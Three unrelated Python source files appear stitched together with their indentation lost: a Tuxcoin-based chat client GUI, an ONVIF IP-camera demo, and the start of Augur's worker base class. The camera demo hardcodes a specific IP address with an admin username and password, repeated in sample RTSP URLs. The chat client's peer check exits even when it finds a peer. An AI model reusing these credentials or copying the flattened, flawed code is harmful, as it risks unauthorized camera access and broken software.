self.roomCombo['values'] = roomChoice[::-1]
self.roomCombo.current(0)
self.roomCombo.grid(row=3, column=2, sticky="W")
self.roomBtn = Button(self.popup, text='Refresh/Submit', command = lambda : self.newRoom(self.roomCombo.get()))
self.roomBtn.grid(row=3, column=5)
self.blLabel = Label(self.popup, text="Blacklist: ", font=("Noto", 10, "bold"))
self.blLabel.grid(row=4, column=1, pady=10)
blChoice = getBlocked()['blackList']
selectedRoomChoice = StringVar()
self.blCombo = ttk.Combobox(self.popup, textvariable=selectedRoomChoice, width=36)
self.blCombo['values'] = blChoice
self.blCombo.grid(row=4, column=2, sticky="W")
self.blBtn = Button(self.popup, text='Submit', command = lambda : self.rmBlackList(self.blCombo.get()))
self.blBtn.grid(row=4, column=5)
self.settingsDisable()
self.B1 = ttk.Button(self.popup, text="Close", command = self.killPopup)
self.B1.grid(row=5, column=2)
self.B2 = ttk.Button(self.popup, text="Edit", command = self.settingsEdit)
self.B2.grid(row=5, column=3)
ToolTip(widget = self.addrLabel, text = "Address used to sign messages with.\nLeave blank to generate new random address.")
ToolTip(widget = self.nameLabel, text = "Your screen name.")
ToolTip(widget = self.colorLabel, text = "The color of your screen name.")
ToolTip(widget = self.roomLabel, text = "The current room that you are in. To change either make a selectin from the dropdown, or type the name of a room in.")
ToolTip(widget = self.blLabel, text = "The current blacklist. Addresses can be removed from the list through this.")
self.popup.protocol("WM_DELETE_WINDOW", self.killPopup)
self.popup.mainloop()
def newRoom(self, room):
room = room.strip()
if room in settings()['roomHistory']:
with open('settings.json', 'r+') as f:
data = json.load(f)
data['room'] = room
data['roomHistory'].remove(room)
data['roomHistory'].append(room)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
self.textCons.config(state = NORMAL)
self.textCons.delete(1.0, END)
self.textCons.config(state = DISABLED)
setBlock()
self.masterMsg = []
if len(self.name) > 24:
dots = '...'
else:
dots = ''
self.labelHead['text'] = f"{self.name[0:24]}{dots} | {settings()['room'].strip()}"
self.killPopup()
else:
with open('settings.json', 'r+') as f:
data = json.load(f)
data['room'] = room
data['roomHistory'].append(room)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
self.textCons.config(state = NORMAL)
self.textCons.delete(1.0, END)
self.textCons.config(state = DISABLED)
setBlock()
self.masterMsg = []
if len(self.name) > 24:
dots = '...'
else:
dots = ''
self.labelHead['text'] = f"{self.name[0:24]}{dots} | {settings()['room'].strip()}"
self.killPopup()
def settingsDisable(self):
self.addrEntry.config(state='readonly')
self.addrBtn.config(state='disabled')
self.nameEntry.config(state='readonly')
self.colorCombo.config(state='disabled')
self.nameBtn.config(state='disabled')
self.blCombo.config(state='disabled')
self.blBtn.config(state='disabled')
def settingsEdit(self):
confirm = messagebox.askyesno("Confirmation", "Are you sure you want to edit settings?")
if confirm:
self.B2.config(state='disabled')
self.addrEntry.config(state='normal')
self.addrBtn.config(state='normal')
self.nameEntry.config(state='normal')
self.colorCombo.config(state='readonly')
self.nameBtn.config(state='normal')
self.blCombo.config(state='readonly')
self.blBtn.config(state='normal')
self.popup.lift()
else:
self.popup.lift()
def killPopup(self):
self.buttonSetting.config(state='normal')
self.popup.destroy()
def setName(self, name, color):
if color == "":
messagebox.showwarning("Warning", f"Please select a color")
return
name = ''.join(name.split())
if len(name) > 30:
messagebox.showwarning("Warning -Name too long", f"Name too long.\nPlease choose a name that is 30 characters or less.")
return
elif name == subName(settings()['signingAddress']) and color == subColor(settings()['signingAddress']):
return
elif name.upper() in getNames()['nameList'] and name.upper() != subName(settings()['signingAddress']).upper():
messagebox.showwarning("Warning -Name already in use", f"Name already in use, please choose a different name.")
return
else:
verify = messagebox.askyesno("Confirmation", f"Are you sure you want to use the name: {name} with the color: {color}?")
if verify:
signature = {}
timestamp = int(time.time())
addr = settings()['signingAddress']
sig = rpcproxy().signmessage(addr, name + str(timestamp))
signature['addr'] = addr
signature['sig'] = sig
message = {'message': name, 'sig': signature['sig'], 'addr': signature['addr'], "nameRequest": color, "time": timestamp}
try:
req = rpcproxy().sendmessage(json.dumps(message))
messagebox.showinfo("Information", f"Name request successfully submitted.\nName request must be included in a block to take affect.\nTXID: {req}")
self.killPopup()
except Exception as e:
print(e)
print("Name request successfully submitted. Please allow a few minutes for name change to take affect.")
def setAddr(self, addr):
if addr == '':
addr = rpcproxy().getnewaddress("", "legacy")
if validateAddress(addr)[0] == False:
messagebox.showwarning("Warning", f"{validateAddress(addr)[1]}")
elif addr == settings()['signingAddress']:
return
else:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to use the address: {addr}")
if confirm:
with open('settings.json', 'r+') as f:
data = json.load(f)
data['signingAddress'] = addr
f.seek(0)
json.dump(data, f, indent = 4)
self.addrEntry.delete(0, END)
self.addrEntry.insert(END, settings()['signingAddress'])
messagebox.showinfo("INFO", f"Address successfully updated.")
self.killPopup()
# function to basically start the thread for sending messages
def sendButton(self, msg):
self.msg = msg
if validateAddress(settings()['signingAddress']) == False or settings()['signingAddress'] == '':
messagebox.showerror("ERROR", f"Valid signing address not found!\nPlease add a valid signing address in settings!")
return
if self.checkBytes(self.msg) == False:
return
if rpcproxy().getbalance() < 1:
messagebox.showerror("ERROR", f"Low Balance!")
return
self.textCons.config(state = DISABLED)
self.entryMsg.delete(1.0, END)
snd= threading.Thread(target = self.sendMessage)
snd.start()
self.buttonMsg.config(state='disabled')
self.buttonMsg.after(1000, lambda: self.buttonMsg.config(state='normal'))
def checkBytes(self, msg):
msgLen = len(msg.strip().encode('raw_unicode_escape'))
roomLen = len(settings()['room'].strip().encode('raw_unicode_escape'))
metaLen = roomLen + 190
maxLen = 1010 - metaLen
totalLen = msgLen + metaLen
#print(msgLen)
#print(totalLen)
if totalLen > 1010:
messagebox.showwarning("Warning", f"Message exceeds maximum possible Bytes.\nMax Possible: {maxLen}\nYour message: {msgLen}")
return False
else:
return True
def getInfo(self, event):
thing = self.textCons.index(f"@{event.x},{event.y}"), self.textCons.index("current")
#print(thing)
thing = thing[0]
for i in reversed(self.masterMsg):
if i['index'] == int(float(thing)):
self.popinfo = Tk()
self.popinfo.wm_title("Message Info")
label = Text(self.popinfo)
label.grid(row=1, column=1, columnspan=10, rowspan=10, pady=10)
label.insert(END, f"Sender: {i['addr']}\nScreen name: {subName(i['addr'], True)}\nRoom: {i['rm']}\nSignature: {i['sig']}\nTXID: {i['txid']}\nTimestamp: {i['time']}\nMessage Time: {datetime.fromtimestamp(i['time'])}\nMessage:\n{i['message']}")
label.config(state = DISABLED)
if i['addr'] in getBlocked()['blockList']:
B2text = "Unblock"
else:
B2text = "Block"
if i['addr'] in getBlocked()['hideName']:
B4text = "Unhide Name"
else:
B4text = "Hide Name"
B1 = ttk.Button(self.popinfo, text="Close", command = self.popinfo.destroy)
B1.grid(row=11, column=3)
B2 = ttk.Button(self.popinfo, text=B2text, command = lambda : self.addBlock(i['addr']))
B2.grid(row=11, column=4)
B3 = ttk.Button(self.popinfo, text="Blacklist", command = lambda : self.addBlackList(i['addr']))
B3.grid(row=11, column=5)
B4 = ttk.Button(self.popinfo, text=B4text, command = lambda : self.addHideName(i['addr']))
B4.grid(row=11, column=6)
self.popinfo.mainloop()
break
return "break"
def addHideName(self, addr):
if addr == settings()['signingAddress']:
return
elif addr in getBlocked()['hideName']:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want unhide the following name From user\n{addr}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['hideName'].remove(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully unhidden name.")
self.popinfo.destroy()
else:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want hide the following name\n{subName(addr)}\nFrom user\n{addr}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['hideName'].append(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully hidden name.")
self.popinfo.destroy()
def rmBlackList(self, addr):
if addr in getBlocked()['blackList']:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to remove\nADDR: {addr}\nScreen Name: {subName(addr)}\n from the black list?")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blackList'].remove(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully removed\n{addr}\nfrom black list.")
self.killPopup()
def addBlackList(self, addr):
if addr == settings()['signingAddress']:
return
elif addr in getBlocked()['blackList']:
return
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to add\nADDR: {addr}\nScreen Name: {subName(addr)}\n to the black list?")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blackList'].append(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully added\n{addr}\nto black list.")
self.popinfo.destroy()
def addBlock(self, addr):
if addr == settings()['signingAddress']:
return
elif addr in getBlocked()['blockList']:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to unblock\nADDR: {addr}\nScreen Name: {subName(addr)}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blockList'].remove(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully removed\n{addr}\nfrom the block list.")
self.popinfo.destroy()
else:
confirm = messagebox.askyesno("Confirmation", f"Are you sure you want to block\nADDR: {addr}\nScreen Name: {subName(addr)}")
if confirm:
with open('blocklist.json', 'r+') as f:
data = json.load(f)
data['blockList'].append(addr)
f.seek(0)
json.dump(data, f, indent = 4)
f.truncate()
messagebox.showinfo("Information", f"Successfully added\n{addr}\nto block list.")
self.popinfo.destroy()
# function to receive messages
def receive(self):
self.textCons.tag_add("gray", END)
self.textCons.tag_config("gray", foreground="gray", font=("Noto", 9))
self.textCons.tag_add("red", END)
self.textCons.tag_bind("red", "<Button-1>", self.getInfo)
self.textCons.tag_bind("red", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("red", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("red", foreground="red")
self.textCons.tag_add("green", END)
self.textCons.tag_bind("green", "<Button-1>", self.getInfo)
self.textCons.tag_bind("green", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("green", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("green", foreground="green")
self.textCons.tag_add("blue", END)
self.textCons.tag_bind("blue", "<Button-1>", self.getInfo)
self.textCons.tag_bind("blue", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("blue", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("blue", foreground="blue")
self.textCons.tag_add("yellow", END)
self.textCons.tag_bind("yellow", "<Button-1>", self.getInfo)
self.textCons.tag_bind("yellow", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("yellow", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("yellow", foreground="yellow")
self.textCons.tag_add("cyan", END)
self.textCons.tag_bind("cyan", "<Button-1>", self.getInfo)
self.textCons.tag_bind("cyan", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("cyan", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("cyan", foreground="cyan")
self.textCons.tag_add("pink", END)
self.textCons.tag_bind("pink", "<Button-1>", self.getInfo)
self.textCons.tag_bind("pink", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("pink", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("pink", foreground="pink")
self.textCons.tag_add("purple", END)
self.textCons.tag_bind("purple", "<Button-1>", self.getInfo)
self.textCons.tag_bind("purple", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("purple", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("purple", foreground="purple")
self.textCons.tag_add("magenta", END)
self.textCons.tag_bind("magenta", "<Button-1>", self.getInfo)
self.textCons.tag_bind("magenta", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("magenta", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("magenta", foreground="magenta")
self.textCons.tag_add("black", END)
self.textCons.tag_bind("black", "<Button-1>", self.getInfo)
self.textCons.tag_bind("black", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("black", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("black", foreground="black")
self.textCons.tag_add("white", END)
self.textCons.tag_bind("white", "<Button-1>", self.getInfo)
self.textCons.tag_bind("white", "<Enter>", lambda e: self.textCons.config(cursor="hand2"))
self.textCons.tag_bind("white", "<Leave>", lambda e: self.textCons.config(cursor=""))
self.textCons.tag_config("white", foreground="white")
while True:
try:
message = getMessages()
self.updateName()
self.updateBalance()
for i in message:
# insert messages to text box
uname = subName(i['addr']) #i.split(':')[0]
i['index'] = self.getRow()
if i['addr'] in getBlocked()['blockList']:
message = "<BLOCKED>"
else:
message = subEmotes(i['message'])
self.textCons.config(state = NORMAL)
self.textCons.insert(END, f"{uname}: ", subColor(i['addr']))
self.textCons.insert(END, f"{datetime.fromtimestamp(i['time'])}\n", "gray")
self.textCons.insert(END,
f"{message}\n\n")
self.textCons.config(state = DISABLED)
self.textCons.see(END)
if settings()['mute'] == False and self.focus == False:
self.ps.play()
self.masterMsg.append(i)
except Exception as e:
# an error will be printed on the command line or console if there's an error
print("An error occured!")
print(e)
break
time.sleep(0.1)
def getRow(self):
index = self.textCons.index("end-1c")
row = int(float(index)) #index.split(".")[0]
return row
def onClose(self):
self.Window.destroy()
os._exit(0)
def enterbtn(self, msg):
self.entryMsg.delete("insert-1c")
self.buttonMsg.invoke()
def shiftenterbtn(self, msg):
self.entryMsg.insert(END, "")
def focusIn(self, focus):
self.focus = True
def focusOut(self, focus):
self.focus = False
def paste(self):
self.entryMsg.insert(END, pyperclip.paste())
def copy(self):
pyperclip.copy(self.entryMsg.selection_get())
self.textCons.tag_remove(SEL, "1.0", END)
def cut(self):
pyperclip.copy(self.entryMsg.selection_get())
try:
self.entryMsg.delete("sel.first", "sel.last")
except:
self.textCons.tag_remove(SEL, "1.0", END)
def signMessage(self, msg, time, room):
signature = {}
self.signature = signature
self.msg = msg
addr = settings()['signingAddress']
sig = rpcproxy().signmessage(addr, self.msg + str(time) + str(room))
self.signature['addr'] = addr
self.signature['sig'] = sig
return self.signature
# function to send messages
def sendMessage(self):
self.textCons.config(state=DISABLED)
timestamp = int(time.time())
sig = self.signMessage(self.msg.strip(), timestamp, settings()['room'].strip())
while True:
if self.msg.strip() == '':
print("Blank message not allowed.")
break
message = {'message': self.msg.strip(), 'sig': sig['sig'], 'addr': sig['addr'], "rm": settings()['room'].strip(), "time": timestamp}
self.message = message
try:
rpcproxy().sendmessage(self.json.dumps(message))
except Exception as e:
print(e)
self.lastMsg = timestamp
break
def setBlock():
global bestBlock
global seenTX
seenTX = []
currentHeight = rpcproxy().getblockcount()
bestBlock = currentHeight - settings()['history']
def checkSetup():
system_type = platform.system()
if system_type == 'Linux':
settingsFile = os.path.expanduser('~/.config/tuxchat/settings.json')
if os.path.isfile(settingsFile) == False:
pass
#print('lol')
elif system_type == 'Windows':
settingsFile = os.path.expanduser('~\\AppData\\Roaming\\tuxchat\\tuxchat\\settings.json')
def checkConnection():
print('Checking connection to Tuxcoin wallet...')
try:
ver = rpcproxy().getnetworkinfo()['subversion']
print('Connection sucessful!')
except:
print('No connection to Tuxcoin wallet')
input("Press Enter to close")
sys.exit()
print('Checking for compatable wallet version...')
if int(''.join(filter(str.isdigit, ver))) < 182:
print(f'Tuxcoin wallet version too low.\nHas: {ver}\nRequired: TuxcoinCore:0.18.2 or higher.')
input("Press Enter to close")
sys.exit()
else:
print(f'Wallet version is: {ver}\nCompatible wallet detected!')
def checkPeers():
print('Checking for compatable peers on the Tuxcoin network...')
peers = rpcproxy().getpeerinfo()
for i in peers:
ver = int(''.join(filter(str.isdigit, i['subver'])))
if ver < 182:
continue
else:
print("Compatable peer found!")
break
print('No compatable peers found')
input("Press Enter to close")
sys.exit()
def validateAddress(addr):
val = rpcproxy().validateaddress(addr)
if val['isvalid'] == True and val['ismine'] == True and val['isscript'] == False and val['iswitness'] == False:
print('Address validated!')
msg = 'Address validated!'
return (True, msg)
else:
if val['isvalid'] == False:
print('Not a valid Tuxcoin address!')
msg = 'Not a valid Tuxcoin address!'
return (False, msg)
elif val['ismine'] == False:
print("Address not owned by wallet!")
msg = "Address not owned by wallet!"
return (False, msg)
elif val['isscript'] == True or val['iswitness'] == True:
print("Invalid address type!\nAddress must be Legacy, not segwit/bech32")
msg = "Invalid address type!\nAddress must be Legacy, not segwit/bech32"
return (False, msg)
def startNames():
while True:
names.main()
time.sleep(10)
def main():
print(f"Welcome to tuxchat version: {version}")
checkSetup()
checkConnection()
checkPeers()
setBlock()
print('Refreshing screen name database. This may take several minutes.')
print('Building database...')
names.main()
gnm = threading.Thread(target=startNames)
gnm.start()
main()
# create a GUI class object
g = GUI()
|
demo.py
|
# -*- coding: utf-8 -*-
import datetime
from onvif2 import ONVIFCamera
from zeep.transports import Transport
import json
import os
import sys
def getexepath():
"""
返回可执行程序的当前路径。 sys.argv 中保存了可执行程序的全路径
:return:
"""
return os.path.split(os.path.realpath(sys.argv[0]))[0]
class COnvifClient:
def __init__(self):
self.mycam = None
self.media_service = None
self.media2_service = None
self.events_service = None
self.name = None
self.pwd = None
def __del__(self):
pass
def conn(self, ip, port, name, pwd) -> bool:
"""
通过鉴权对设备进行连接.
media\media2 默认加载,其他模块按需加载
:param ip:
:param port:
:param name:
:param pwd:
:return:
"""
try:
# 设置操作时间
transport = Transport(operation_timeout=10)
# 设置wsdl 文件夹目录,需要把wsdl 复制到当前可执行文件目录
self.mycam = ONVIFCamera(ip, port, name, pwd, wsdl_dir=getexepath() + '/wsdl',
transport=transport)
except Exception as e:
print('error: {}'.format(e))
return False
finally:
pass
self.name = name
self.pwd = pwd
return self.getmedia()
# ---------------------------------- media \ media2 -------------------------------------------
def getmedia(self):
"""
获取media: 分为media2、media,其中media2支持h265,media只支持h264
:return:
# 先使用media2,再使用media: media2支持h265
# 比如海康、大华、宇视都支持media2, 淼盾只支持media
"""
try:
self.media2_service = self.mycam.create_media2_service()
except Exception as e:
print('error: {}'.format(e))
finally:
pass
# media 获取h264
if self.media2_service is None:
try:
self.media_service = self.mycam.create_media_service()
except Exception as e:
print('error: {}'.format(e))
return False
finally:
pass
return True
def _getstreamuri_media(self) -> list:
"""
通过media 获取rtsp地址
:return:
"""
profiles = self.media_service.GetProfiles()
urilist = []
for profile in profiles:
o = self.media_service.create_type('GetStreamUri')
o.ProfileToken = profile.token
o.StreamSetup = {'Stream': 'RTP-Unicast', 'Transport': {'Protocol': 'RTSP'}}
r = self.media_service.GetStreamUri(o)
# 携带鉴权信息
if self.pwd != '':
dic = {'token': profile.token,
'rtsp': "rtsp://{}:{}@{}".format(self.name, self.pwd, r['Uri'][7:])}
else:
dic = {'token': profile.token,
'rtsp': r['Uri']}
urilist.append(dic)
return urilist
def _getvideo_media(self) -> list:
"""
通过media获取视频参数
:return:
"""
configurations = self.media_service.GetVideoEncoderConfigurations()
lns = []
for configuration in configurations:
if configuration['Encoding'].lower() == 'h264':
width = configuration['Resolution']['Width']
height = configuration['Resolution']['Height']
dic = {'token': configuration['token'],
'encoding': configuration['Encoding'],
'ratio': "{}*{}".format(width, height),
'fps': configuration['RateControl']['FrameRateLimit'],
'bitrate': configuration['RateControl']['BitrateLimit'],
'gop': configuration['H264']['GovLength'],
'profile': configuration['H264']['H264Profile'],
'quality': configuration['Quality']}
else:
dic = {'token': configuration['Name'], 'encoding': configuration['Encoding']}
lns.append(dic)
return lns
def _getstreamuri_media2(self) -> list:
"""通过media2.0 版本获取rtsp地址"""
profiles = self.media2_service.GetProfiles()
urilist = []
for profile in profiles:
o = self.media2_service.create_type('GetStreamUri')
o.ProfileToken = profile.token
o.Protocol = 'RTSP'
uri = self.media2_service.GetStreamUri(o)
# 携带鉴权信息
if self.pwd != '':
dic = {'token': profile.token,
'rtsp': "rtsp://{}:{}@{}".format(self.name, self.pwd, uri[7:])}
else:
dic = {'token': profile.token,
'rtsp': uri}
urilist.append(dic)
return urilist
def _getvideo_media2(self) -> list:
"""通过media2获取编码配置,media2支持h265"""
configurations = self.media2_service.GetVideoEncoderConfigurations()
lns = []
for configuration in configurations:
if configuration['Encoding'].lower() == 'h264' or configuration['Encoding'].lower() == 'h265':
width = configuration['Resolution']['Width']
height = configuration['Resolution']['Height']
dic = {'token': configuration['token'],
'encoding': configuration['Encoding'],
'ratio': "{}*{}".format(width, height),
'fps': configuration['RateControl']['FrameRateLimit'],
'bitrate': configuration['RateControl']['BitrateLimit'],
'gop': configuration['GovLength'],
'profile': configuration['Profile'],
'quality': configuration['Quality']}
else:
dic = {'token': configuration['Name'], 'encoding': configuration['Encoding']}
lns.append(dic)
return lns
def getsteamuri(self) -> list:
"""
获取流地址
:return:
"""
if self.media2_service is not None:
urls = self._getstreamuri_media2()
else:
urls = self._getstreamuri_media()
return urls
def getvideo(self) -> list:
"""
获取视频信息
:return:
"""
if self.media2_service is not None:
vidoes = self._getvideo_media2()
else:
vidoes = self._getvideo_media()
return vidoes
# --------------------------------------------- device management ------------------------------------
def getdeviceinfo(self) -> dict:
"""
获取onvif设备基础信息
"FirmwareVersion": "IPC_Q1207-B0006D1904",
"HardwareId": "xdfd@SH-FA-VA",
"Manufacturer": "bbb",
"Model": "xdfd@SH-FA-VA",
"SerialNumber": "210235C3EN3193000033"
"""
resp = self.mycam.devicemgmt.GetDeviceInformation()
dic = {'manufacturer': resp.Manufacturer,
'model': resp.Model,
'firmwareversion': resp.FirmwareVersion,
'serialnumber': resp.SerialNumber,
'hardwareid': resp.HardwareId}
return dic
# ---------------------------------------- event ------------------------------------------------
def subEvent(self):
"""
简单描述了核心逻辑,具体需求时需要再修改
订阅事件通知,
采用real-time pull-point Notification interface 模式。 需要启动线程
资料介绍: http://www.doc88.com/p-381499525793.html
该模式采用的方式:
createPullPoint() ---- > ipc
pullMessagees ---- > ipc
------ http wait n seconds ------
pullMessagesRespons <-- ipc
pullMessagees ---- > ipc
------ http wait n seconds ------
pullMessagesRespons <-- ipc
............
unsubscribe ---- > ipc
:return:
"""
# event 订阅事件
self.events_service = self.mycam.create_events_service()
print(self.events_service.GetEventProperties())
pullpoint = self.mycam.create_pullpoint_service()
"""模块启动时,自动启动一个线程执行清理"""
# t1 = threading.Thread(target=_time_task, daemon=True)
# t1.start()
###### _time_task #######
while True:
try:
pullmess = pullpoint.PullMessages({"Timeout": datetime.timedelta(seconds=5), "MessageLimit": 10})
print(pullmess.CurrentTime)
print(pullmess.TerminationTime)
for msg in pullmess.NotificationMessage:
print(msg)
except Exception as e:
print(e)
finally:
pass
if __name__ == '__main__':
obj = COnvifClient()
if obj.conn('204.204.50.190', 80, 'admin', '*Ab123456') is True:
"""
{
"manufacturer": "HIKVISION",
"model": "DS-IPC-B12HV2-IA",
"firmwareversion": "V5.5.102 build 200928",
"serialnumber": "DS-IPC-B12HV2-IA20201125AACHF11786005",
"hardwareid": "88"
}
"""
print(json.dumps(obj.getdeviceinfo()))
"""
[
{"token": "Profile_1", "rtsp": "rtsp://admin:*Ab123456@204.204.50.190/Streaming/Channels/101?transportmode=unicast&profile=Profile_1"},
{"token": "Profile_2", "rtsp": "rtsp://admin:*Ab123456@204.204.50.190/Streaming/Channels/102?transportmode=unicast&profile=Profile_2"}
]
"""
print(json.dumps(obj.getsteamuri()))
"""
[
{"token": "VideoEncoderToken_1", "encoding": "H264", "ratio": "1920*1080", "fps": 25.0, "bitrate": 2614, "gop": 25, "profile": "Main", "quality": 3.0},
{"token": "VideoEncoderToken_2", "encoding": "H265", "ratio": "640*480", "fps": 8.0, "bitrate": 192, "gop": 50, "profile": "Main", "quality": 3.0}]
"""
print(json.dumps(obj.getvideo()))
"""
2021-06-01 07:15:26+00:00
2021-06-01 07:25:31+00:00
{
'SubscriptionReference': None,
'Topic': {
'_value_1': 'tns1:Monitoring/ProcessorUsage',
'Dialect': 'http://www.onvif.org/ver10/tev/topicExpression/ConcreteSet',
'_attr_1': {
}
},
'ProducerReference': None,
'Message': {
'Message': {
'Source': {
'SimpleItem': [
{
'Name': 'Token',
'Value': 'Processor_Usage'
}
],
'ElementItem': [],
'Extension': None,
'_attr_1': None
},
'Key': None,
'Data': {
'SimpleItem': [
{
'Name': 'Value',
'Value': '37'
}
],
'ElementItem': [],
'Extension': None,
'_attr_1': None
},
'Extension': None,
'UtcTime': datetime.datetime(2021, 6, 1, 7, 15, 30, tzinfo=<isodate.tzinfo.Utc object at 0x000001F821BD1F40>),
'PropertyOperation': 'Changed',
'_attr_1': {
}
}
}
}
"""
print(obj.subEvent())
|
worker_base.py
|
#SPDX-License-Identifier: MIT
""" Helper methods constant across all workers """
import requests
import datetime
import time
import traceback
import json
import os
import sys
import math
import logging
import numpy
import copy
import concurrent
import multiprocessing
import psycopg2
import csv
import io
from logging import FileHandler, Formatter, StreamHandler
from multiprocessing import Process, Queue, Pool
from os import getpid
import sqlalchemy as s
import pandas as pd
from pathlib import Path
from urllib.parse import urlparse, quote
from sqlalchemy.ext.automap import automap_base
from augur.config import AugurConfig
from augur.logging import AugurLogging
from sqlalchemy.sql.expression import bindparam
from concurrent import futures
import dask.dataframe as dd
class Worker():
ROOT_AUGUR_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
## Set Thread Safety for OSX
# os.system("./osx-thread.sh")
def __init__(self, worker_type, config={}, given=[], models=[], data_tables=[], operations_tables=[], platform="github"):
self.worker_type = worker_type
self.collection_start_time = None
self._task = None # task currently being worked on (dict)
self._child = None # process of currently running task (multiprocessing process)
self._queue = Queue() # tasks stored here 1 at a time (in a mp queue so it can translate across multiple processes)
self.data_tables = data_tables
self.operations_tables = operations_tables
self._root_augur_dir = Worker.ROOT_AUGUR_DIR
self.platform = platform
# count of tuples inserted in the database (to store stats for each task in op tables)
self.update_counter = 0
self.insert_counter = 0
self._results_counter = 0
# if we are finishing a previous task, certain operations work differently
self.finishing_task = False
# Update config with options that are general and not specific to any worker
self.augur_config = AugurConfig(self._root_augur_dir)
self.config = {
'worker_type': self.worker_type,
'host': self.augur_config.get_value('Server', 'host'),
'gh_api_key': self.augur_config.get_value('Database', 'key'),
'gitlab_api_key': self.augur_config.get_value('Database', 'gitlab_api_key'),
'offline_mode': False
}
self.config.update(self.augur_config.get_section("Logging"))
try:
worker_defaults = self.augur_config.get_default_config()['Workers'][self.config['worker_type']]
self.config.update(worker_defaults)
except KeyError as e:
logging.warn('Could not get default configuration for {}'.format(self.config['worker_type']))
worker_info = self.augur_config.get_value('Workers', self.config['worker_type'])
self.config.update(worker_info)
worker_port = self.config['port']
while True:
try:
r = requests.get('http://{}:{}/AUGWOP/heartbeat'.format(
self.config['host'], worker_port)).json()
if 'status' in r:
if r['status'] == 'alive':
worker_port += 1
except:
break
self.config.update({
'port': worker_port,
'id': "workers.{}.{}".format(self.worker_type, worker_port),
'capture_output': False,
'location': 'http://{}:{}'.format(self.config['host'], worker_port),
'port_broker': self.augur_config.get_value('Server', 'port'),
'host_broker': self.augur_config.get_value('Server', 'host'),
'host_database': self.augur_config.get_value('Database', 'host'),
'port_database': self.augur_config.get_value('Database', 'port'),
'user_database': self.augur_config.get_value('Database', 'user'),
'name_database': self.augur_config.get_value('Database', 'name'),
'password_database': self.augur_config.get_value('Database', 'password')
})
self.config.update(config)
# Initialize logging in the main process
self.initialize_logging()
# Clear log contents from previous runs
open(self.config["server_logfile"], "w").close()
open(self.config["collection_logfile"], "w").close()
# Get configured collection logger
self.logger = logging.getLogger(self.config["id"])
self.logger.info('Worker (PID: {}) initializing...'.format(str(os.getpid())))
self.task_info = None
self.repo_id = None
self.owner = None
self.repo = None
self.given = given
self.models = models
self.debug_data = [] if 'debug_data' not in self.config else self.config['debug_data']
self.specs = {
'id': self.config['id'], # what the broker knows this worker as
'location': self.config['location'], # host + port worker is running on (so broker can send tasks here)
'qualifications': [
{
'given': self.given, # type of repo this worker can be given as a task
'models': self.models # models this worker can fill for a repo as a task
}
],
'config': self.config
}
# Send broker hello message
if self.config['offline_mode'] is False:
self.connect_to_broker()
try:
self.tool_source
self.tool_version
self.data_source
except:
self.tool_source = 'Augur Worker Testing'
self.tool_version = '0.0.0'
self.data_source = 'Augur Worker Testing'
def __repr__(self):
return f"{self.config['id']}"
def write_debug_data(self, data, name):
if name in self.debug_data:
with open(f'{name}.json', 'w') as f:
json.dump(data, f)
def initialize_logging(self):
self.config['log_level'] = self.config['log_level'].upper()
if self.config['debug']:
self.config['log_level'] = 'DEBUG'
if self.config['verbose']:
format_string = AugurLogging.verbose_format_string
else:
format_string = AugurLogging.simple_format_string
formatter = Formatter(fmt=format_string)
error_formatter = Formatter(fmt=AugurLogging.error_format_string)
worker_dir = AugurLogging.get_log_directories(self.augur_config, reset_logfiles=False) + "/workers/"
Path(worker_dir).mkdir(exist_ok=True)
logfile_dir = worker_dir + f"/{self.worker_type}/"
Path(logfile_dir).mkdir(exist_ok=True)
server_logfile = logfile_dir + '{}_{}_server.log'.format(self.worker_type, self.config["port"])
collection_logfile = logfile_dir + '{}_{}_collection.log'.format(self.worker_type, self.config["port"])
collection_errorfile = logfile_dir + '{}_{}_collection.err'.format(self.worker_type, self.config["port"])
self.config.update({
'logfile_dir': logfile_dir,
'server_logfile': server_logfile,
'collection_logfile': collection_logfile,
